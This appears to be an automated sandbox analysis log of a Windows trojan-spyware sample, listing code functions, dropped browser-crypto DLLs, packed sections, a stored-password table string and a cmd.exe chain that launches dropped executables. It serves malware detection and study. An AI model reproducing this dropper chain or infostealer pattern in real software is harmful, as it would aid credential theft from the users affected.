Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3734A0 0_2_6C3734A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C4A0 0_2_6C37C4A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C326C80 0_2_6C326C80
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C356CF0 0_2_6C356CF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31D4E0 0_2_6C31D4E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33D4D0 0_2_6C33D4D0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3264C0 0_2_6C3264C0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33ED10 0_2_6C33ED10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C340512 0_2_6C340512
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32FD00 0_2_6C32FD00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3785F0 0_2_6C3785F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C350DD0 0_2_6C350DD0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C379E30 0_2_6C379E30
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C357E10 0_2_6C357E10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C365600 0_2_6C365600
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31C670 0_2_6C31C670
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C386E63 0_2_6C386E63
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C339E50 0_2_6C339E50
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C353E50 0_2_6C353E50
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C334640 0_2_6C334640
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C362E4E 0_2_6C362E4E
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C374EA0 0_2_6C374EA0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C335E90 0_2_6C335E90
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37E680 0_2_6C37E680
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31BEF0 0_2_6C31BEF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32FEF0 0_2_6C32FEF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3876E3 0_2_6C3876E3
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C357710 0_2_6C357710
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C329F00 0_2_6C329F00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3677A0 0_2_6C3677A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C346FF0 0_2_6C346FF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31DFE0 0_2_6C31DFE0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35B820 0_2_6C35B820
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C364820 0_2_6C364820
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C327810 0_2_6C327810
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35F070 0_2_6C35F070
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C338850 0_2_6C338850
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33D850 0_2_6C33D850
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3460A0 0_2_6C3460A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33C0E0 0_2_6C33C0E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3558E0 0_2_6C3558E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3850C7 0_2_6C3850C7
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C36B970 0_2_6C36B970
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38B170 0_2_6C38B170
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32D960 0_2_6C32D960
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33A940 0_2_6C33A940
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34D9B0 0_2_6C34D9B0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31C9A0 0_2_6C31C9A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C355190 0_2_6C355190
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C372990 0_2_6C372990
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C359A60 0_2_6C359A60
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32CAB0 0_2_6C32CAB0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C382AB0 0_2_6C382AB0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3122A0 0_2_6C3122A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C344AA0 0_2_6C344AA0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38BA90 0_2_6C38BA90
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C331AF0 0_2_6C331AF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35E2F0 0_2_6C35E2F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C358AC0 0_2_6C358AC0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35D320 0_2_6C35D320
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32C370 0_2_6C32C370
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C315340 0_2_6C315340
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31F380 0_2_6C31F380
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3853C8 0_2_6C3853C8
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004AE410 13_2_004AE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E3048 13_2_004E3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004A4CD0 13_2_004A4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004D7D63 13_2_004D7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E763B 13_2_004E763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004A4AD0 13_2_004A4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E6EE9 13_2_004E6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E775B 13_2_004E775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E8700 13_2_004E8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E2BB0 13_2_004E2BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0000 14_2_7EAE0000
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE097C 14_2_7EAE097C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: String function: 6C34CBE8 appears 134 times
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: String function: 6C3594D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: ukuWaeRgPR.exe, 00000000.00000002.2212483883.000000006C595000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs ukuWaeRgPR.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2211421898.000000006C3A2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs ukuWaeRgPR.exe
Uses 32bit PE files
Source: ukuWaeRgPR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.99365234375
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.989501953125
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: amadka[1].exe.0.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: EHDHDHIECG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: EHDHDHIECG.exe.0.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: explorti.exe.6.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: explorti.exe.6.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.99365234375
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.99365234375
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: explorti.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: EHDHDHIECG.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C377030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C377030
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: ukuWaeRgPR.exe, 00000000.00000003.2051162529.0000000023761000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000003.2030774820.0000000002073000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000003.2051531924.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, IIJKJDAFHJDHIEBGCFID.0.dr, DBAEGCGCGIEGDHIDHJJE.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: ukuWaeRgPR.exe ReversingLabs: Detection: 47%
Source: EHDHDHIECG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File read: C:\Users\user\Desktop\ukuWaeRgPR.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ukuWaeRgPR.exe "C:\Users\user\Desktop\ukuWaeRgPR.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe" Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe" Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
